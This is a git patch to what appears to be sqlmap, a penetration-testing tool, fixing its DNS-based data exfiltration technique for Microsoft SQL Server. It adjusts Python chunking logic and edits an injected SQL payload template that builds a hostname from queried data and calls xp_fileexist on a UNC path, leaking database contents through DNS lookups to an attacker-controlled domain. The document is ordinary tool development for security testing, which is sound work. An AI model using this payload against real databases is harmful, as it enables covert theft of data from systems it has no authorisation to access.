From 5f94987b0f06e2177dab3bc78869356015d2329c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 2 Apr 2012 17:28:18 +0000 Subject: [PATCH] fix for DNS method for MSSQL --- lib/techniques/dns/use.py | 7 +------ procs/mssqlserver/dns_request.txt | 2 +- 2 files changed, 2 insertions(+), 7 deletions(-) diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 4e5870f4c..9ece5cd0f 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -57,12 +57,11 @@ def dnsUse(payload, expression): if output is None: kb.dnsMode = True - pushValue(kb.technique) while True: count += 1 prefix, suffix = ("%s" % randomStr(3) for _ in xrange(2)) - chunk_length = MAX_DNS_LABEL / 2 + chunk_length = MAX_DNS_LABEL / 2 if Backend.isDbms(DBMS.ORACLE) else MAX_DNS_LABEL / 4 - 2 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) @@ -74,9 +73,6 @@ def dnsUse(payload, expression): if Backend.isDbms(DBMS.MSSQL): - kb.technique = PAYLOAD.TECHNIQUE.STACKED - expression = cleanQuery(expression) - comment = queries[Backend.getIdentifiedDbms()].comment.query query = agent.prefixQuery("; %s" % expressionUnescaped) query = agent.suffixQuery("%s;%s" % (query, comment)) @@ -96,7 +92,6 @@ def dnsUse(payload, expression): else: break - kb.technique = popValue() kb.dnsMode = False if output is not None: diff --git a/procs/mssqlserver/dns_request.txt b/procs/mssqlserver/dns_request.txt index e4fd978fc..ebeeb4bc1 100644 --- a/procs/mssqlserver/dns_request.txt +++ b/procs/mssqlserver/dns_request.txt @@ -1,3 +1,3 @@ DECLARE @host varchar(1024); SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%'; -EXEC('xp_fileexist "\' + @host + 'c$boot.ini"'); +EXEC('xp_fileexist "\\' + @host + '\c$boot.ini"');